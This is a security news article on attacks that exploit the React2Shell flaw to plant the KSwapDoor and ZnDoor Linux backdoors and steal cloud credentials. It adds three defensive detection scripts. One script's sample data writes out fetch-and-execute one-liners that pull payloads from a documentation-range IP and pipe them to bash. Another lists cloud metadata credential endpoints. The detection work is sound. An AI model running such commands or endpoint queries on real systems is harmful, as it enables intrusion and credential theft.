React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors

Cybersecurity researchers have confirmed active exploitation of a critical security flaw known as React2Shell, with threat actors using it to deploy multiple Linux-based backdoors, including KSwapDoor and ZnDoor. The findings come from independent investigations by Palo Alto Networks Unit 42 and NTT Security.

According to Unit 42, KSwapDoor is a highly sophisticated remote access tool engineered for stealth-focused intrusions. The malware is designed to resemble the legitimate Linux kernel swap daemon (kswapd), allowing it to blend into normal system activity and evade detection.

Justin Moore, Senior Manager of Threat Intelligence Research at Unit 42, explained that KSwapDoor creates an internal mesh network that allows compromised servers to communicate with each other. This design helps the malware bypass security controls, while encrypted communications conceal attacker activity. The backdoor also includes a sleeper mode, enabling attackers to reactivate it using a covert trigger that can pass through firewalls unnoticed.

Researchers clarified that the malware was previously misidentified as BPFDoor. Further analysis revealed that it provides interactive shell access, command execution, file manipulation, and lateral-movement scanning, making it a full-featured Linux backdoor.
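The kswapd disguise gives defenders one cheap check. Real kswapd instances are kernel threads: their parent is kthreadd (PID 2) and they have no executable image on disk, so a process that carries a kernel-thread name but has an ordinary parent or a real binary path does not belong. The following Python script is an added example, not Unit 42's tooling; it runs the heuristic over a constructed process listing and, on a live Linux host, over /proc directly. The process names and paths in the sample are invented.

```python
"""Spot user-space processes masquerading as the kernel swap daemon.

Added example, not Unit 42's tooling. Heuristic: genuine kswapd threads are
kernel threads, so they are children of kthreadd (PID 2) and have no
executable image on disk. A process named like kswapd with an ordinary
parent or a real binary path is worth pulling for analysis.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    exe: str  # readlink of /proc/<pid>/exe; empty for kernel threads


KTHREADD_PID = 2
# Names kernel threads commonly use; the brackets are optional because
# `ps -o comm` omits them while `ps -o args` shows them.
KERNEL_NAME_RE = re.compile(r"^\[?(kswapd|kworker|ksoftirqd|kblockd)[^\]]*\]?$")


def looks_like_kernel_thread(comm: str) -> bool:
    return KERNEL_NAME_RE.match(comm) is not None


def find_impostors(procs):
    """Return processes that carry a kernel-thread name but are not kernel threads."""
    return [
        p for p in procs
        if looks_like_kernel_thread(p.comm) and (p.ppid != KTHREADD_PID or p.exe)
    ]


def parse_listing(text: str):
    """Parse a 'PID PPID COMM EXE' listing (header line first); EXE may be blank."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        exe = parts[3].strip() if len(parts) > 3 else ""
        procs.append(Proc(pid, ppid, comm, exe))
    return procs


def collect_from_proc():
    """Build the same listing from /proc on a live Linux host (run as root so
    /proc/<pid>/exe is readable for every process)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            # Format: pid (comm) state ppid ...; comm may contain spaces/parens.
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
        except (OSError, ValueError):
            continue  # process exited mid-scan
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""  # kernel threads have no exe link
        procs.append(Proc(pid, ppid, comm, exe))
    return procs


# Constructed listing (not real telemetry): PID 1337 is the impostor.
SAMPLE_LISTING = """\
PID PPID COMM EXE
2 0 kthreadd
93 2 kswapd0
94 2 kworker/0:1
1337 1 kswapd0 /tmp/.X11-unix/kswapd0
1402 1337 sh /usr/bin/dash
"""

if __name__ == "__main__":
    for p in find_impostors(parse_listing(SAMPLE_LISTING)):
        print(f"suspicious: pid={p.pid} ppid={p.ppid} comm={p.comm} exe={p.exe or '-'}")
```

On a real host, swap `parse_listing(SAMPLE_LISTING)` for `collect_from_proc()`. A hit is a lead, not a verdict: capture the binary from `/proc/<pid>/exe` before the process exits, because a deleted-on-disk payload is still readable through that link.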

ZnDoor Attacks Target Organizations in Japan

In a parallel disclosure, NTT Security reported that organizations in Japan are being targeted through React2Shell exploitation to deploy ZnDoor, a remote-access trojan observed in the wild since December 2023. These attacks typically involve executing a bash command that retrieves the payload from a remote server using wget and then runs it on the compromised system.
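That delivery step leaves a recognisable shape in process-creation telemetry: a downloader (wget or curl) whose output is piped into a shell, substituted into a shell command, or written to disk and executed in the same command line. The Python below is an added example, not NTT Security's code; it classifies one command line per record, as found in auditd EXECVE events, EDR process-creation logs or shell history, and the sample commands are constructed (203.0.113.0/24 is a documentation range).

```python
"""Flag fetch-and-execute one-liners in shell command telemetry.

Added example, not NTT Security's code. It scans one command line per entry
(auditd EXECVE records, bash history, EDR process-creation events) for the
pattern NTT describes: wget or curl pulling a payload that is then run.
"""
import re

# downloader output piped straight into a shell: wget -O- URL | bash
PIPE_TO_SHELL_RE = re.compile(
    r"\b(wget|curl)\b[^|;&]*\|\s*(sudo\s+)?(sh|bash|dash|zsh|ash)\b"
)
# shell fed by command substitution: bash -c "$(curl URL)"
CMD_SUBST_RE = re.compile(r"(\$\(|`)\s*(wget|curl)\b")
# download, then chmod/execute in the same command line
FETCH_THEN_RUN_RE = re.compile(
    r"\b(wget|curl)\b.*?(&&|;)\s*(chmod\s+\+?x\b|\./|(sudo\s+)?(sh|bash)\s)"
)
URL_RE = re.compile(r"https?://[^\s'\")|;&]+")


def classify(cmd: str):
    """Return (reason, url) when cmd looks like download-and-execute, else None."""
    if PIPE_TO_SHELL_RE.search(cmd):
        reason = "downloader piped into shell"
    elif CMD_SUBST_RE.search(cmd):
        reason = "downloader output substituted into shell"
    elif FETCH_THEN_RUN_RE.search(cmd):
        reason = "download followed by execution"
    else:
        return None
    m = URL_RE.search(cmd)
    return reason, (m.group(0) if m else None)


def scan(commands):
    """Return (command, reason, url) for every command that classify() flags."""
    hits = []
    for cmd in commands:
        verdict = classify(cmd)
        if verdict:
            hits.append((cmd, *verdict))
    return hits


# Constructed command lines, not from a real incident.
SAMPLE_COMMANDS = [
    "wget -q -O- http://203.0.113.10/zn.sh | bash",
    "curl -fsSL http://203.0.113.10/x -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
    'bash -c "$(curl -s http://203.0.113.10/i)"',
    "curl -s https://api.example.com/health | jq .status",          # benign
    "wget https://example.com/file.tar.gz && tar xzf file.tar.gz",  # benign
]

if __name__ == "__main__":
    for cmd, reason, url in scan(SAMPLE_COMMANDS):
        print(f"[{reason}] url={url}\n    {cmd}")
```

The parent process matters as much as the command: on a React2Shell victim the shell is spawned by the Node.js process serving the application, so scoping these patterns to children of `node` cuts the noise from administrators who legitimately curl-pipe installers.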

Once active, ZnDoor connects back to attacker-controlled infrastructure to receive commands. Its capabilities include executing shell commands, launching interactive shells, browsing and manipulating files, modifying file timestamps, enabling SOCKS5 proxy services, and setting up port forwarding. These features allow attackers to maintain persistent and flexible control over infected systems.

Multiple Threat Groups Weaponizing the Flaw

The vulnerability, tracked as CVE-2025-55182 with a maximum CVSS score of 10.0, has been exploited by several threat actors. Google has identified at least five China-linked groups abusing the flaw to distribute a range of malicious payloads, including tunneling tools, downloaders, and custom backdoors written in Go.

Microsoft also confirmed active exploitation in its advisory, noting that attackers have used the flaw to execute arbitrary commands on compromised hosts. Observed activity includes establishing reverse shells to known Cobalt Strike servers, deploying remote monitoring and management tools such as MeshAgent, modifying SSH authorized_keys files, and enabling root-level access.

Some campaigns have delivered malware families such as VShell, EtherRAT, ShadowPad, SNOWLIGHT, and XMRig. Attackers have also relied on Cloudflare Tunnel endpoints under the trycloudflare.com domain to mask command-and-control traffic and evade network defenses.


Cloud and Credential Theft Activity Observed

Microsoft further revealed that attackers leveraged compromised systems to harvest cloud credentials by querying instance metadata services across major cloud platforms, including Azure, Amazon Web Services, Google Cloud Platform, and Tencent Cloud. The goal was to obtain identity tokens that could be reused to move deeper into cloud environments.
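Both of these behaviours, the metadata-service credential reads described here and the trycloudflare.com tunnel traffic noted earlier, are visible in process-attributed egress telemetry, and the web application's own process has no business talking to either. The Python below is an added example, not Microsoft's detection logic. Its input records are constructed in a simple "timestamp pid comm host path" form, roughly what an EDR or eBPF egress sensor emits, and `parse_line()` is the only piece that needs adapting. The metadata hosts and credential paths follow each provider's public documentation; the assumption that the Next.js app runs under `node` and the allowlist of cloud agents are mine.

```python
"""Flag cloud-credential harvesting and tunnel C2 in process-attributed egress.

Added example, not Microsoft's detection logic. Each input line is a
constructed record of the form 'TIMESTAMP PID COMM DST_HOST PATH', roughly what
an EDR or eBPF egress sensor would emit; parse_line() is the only piece to
adapt. Endpoint hosts and credential paths follow the providers' public docs;
the web-app process name and the agent allowlist are assumptions.
"""

# Instance metadata service endpoints (AWS, Azure and GCP share the link-local
# address; GCP and Tencent Cloud also expose DNS names).
IMDS_HOSTS = {
    "169.254.169.254",
    "fd00:ec2::254",                # AWS IMDS over IPv6
    "metadata.google.internal",
    "metadata.tencentyun.com",
}
# Paths that return credentials rather than harmless instance facts.
CREDENTIAL_PATH_PREFIXES = (
    "/latest/meta-data/iam/security-credentials",      # AWS instance role
    "/latest/api/token",                               # AWS IMDSv2 session token
    "/metadata/identity/oauth2/token",                 # Azure managed identity
    "/computeMetadata/v1/instance/service-accounts",   # GCP service account token
    "/latest/meta-data/cam/security-credentials",      # Tencent Cloud CAM role
)
# Assumed: the Next.js app runs under node; these agents legitimately poll IMDS.
WEB_APP_PROCS = {"node", "next-server"}
IMDS_ALLOWLIST = {"amazon-ssm-agent", "waagent", "google_guest_agent", "cloud-init"}
TUNNEL_SUFFIXES = (".trycloudflare.com",)


def parse_line(line: str):
    ts, pid, comm, host, path = line.split(None, 4)
    return {"ts": ts, "pid": int(pid), "comm": comm, "host": host, "path": path}


def classify(rec):
    """Return a finding dict for one egress record, or None."""
    if rec["host"] in IMDS_HOSTS and rec["comm"] not in IMDS_ALLOWLIST:
        cred = rec["path"].startswith(CREDENTIAL_PATH_PREFIXES)
        from_web = rec["comm"] in WEB_APP_PROCS
        return {
            **rec,
            "kind": "imds-credential-read" if cred else "imds-query",
            # any IMDS contact from the web app is high; other unknown callers
            # are high only when they touch a credential path
            "severity": "high" if (cred or from_web) else "medium",
        }
    if rec["host"].endswith(TUNNEL_SUFFIXES):
        return {**rec, "kind": "tunnel-c2", "severity": "high"}
    return None


def scan_egress(text: str):
    """Classify every record in a newline-separated log and keep the findings."""
    findings = []
    for line in text.strip().splitlines():
        f = classify(parse_line(line))
        if f:
            findings.append(f)
    return findings


# Constructed records, not real telemetry. PID 2210 is the Node.js app server.
SAMPLE_EGRESS = """\
2025-01-01T10:01:02Z 1188 amazon-ssm-agent 169.254.169.254 /latest/meta-data/instance-id
2025-01-01T10:02:15Z 2210 node 169.254.169.254 /latest/meta-data/iam/security-credentials/web-role
2025-01-01T10:02:16Z 2210 node 169.254.169.254 /metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
2025-01-01T10:02:17Z 2210 node metadata.google.internal /computeMetadata/v1/instance/service-accounts/default/token
2025-01-01T10:03:40Z 2290 curl random-words-here.trycloudflare.com /
2025-01-01T10:03:55Z 2301 python3 169.254.169.254 /latest/meta-data/instance-id
2025-01-01T10:04:00Z 2210 node api.example.com /v1/orders
"""

if __name__ == "__main__":
    for f in scan_egress(SAMPLE_EGRESS):
        print(f"{f['severity']:6} {f['kind']:22} pid={f['pid']} {f['comm']} -> {f['host']}{f['path']}")
```

Two caveats. IMDSv2 tokens and a hop limit of 1 defend the metadata service against SSRF from elsewhere, not against code already executing on the instance, so a compromised app server can still mint role credentials; the response is to rotate the instance role's credentials and revoke active sessions, not just to block the path. And if the application never needs instance credentials, deny its uid access to the metadata address at the host firewall (on Linux, an `iptables` OUTPUT rule with `-m owner --uid-owner`) so the theft fails rather than merely being logged.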

Additional tooling observed during these intrusions included secret-discovery utilities such as TruffleHog and Gitleaks, along with custom scripts to extract sensitive information. Attempts to steal AI-related credentials, including OpenAI API keys, Databricks tokens, and Kubernetes service account secrets, were also documented.

Large Scale Campaigns and Global Exposure

In a separate investigation, Italian security firm Beelzebub detailed a campaign dubbed Operation PCPcat, where attackers exploited flaws in Next.js to systematically extract sensitive data, establish persistence, deploy SOCKS5 proxies, and scan the internet for additional vulnerable hosts. The operation is estimated to have compromised more than 59,000 servers worldwide.

Internet-wide monitoring shows that the scale of the exposure remains significant. The Shadowserver Foundation is currently tracking over 111,000 IP addresses that remain vulnerable to React2Shell attacks. Meanwhile, telemetry from GreyNoise indicates hundreds of malicious IP addresses actively participating in exploitation attempts across multiple countries within the past 24 hours.
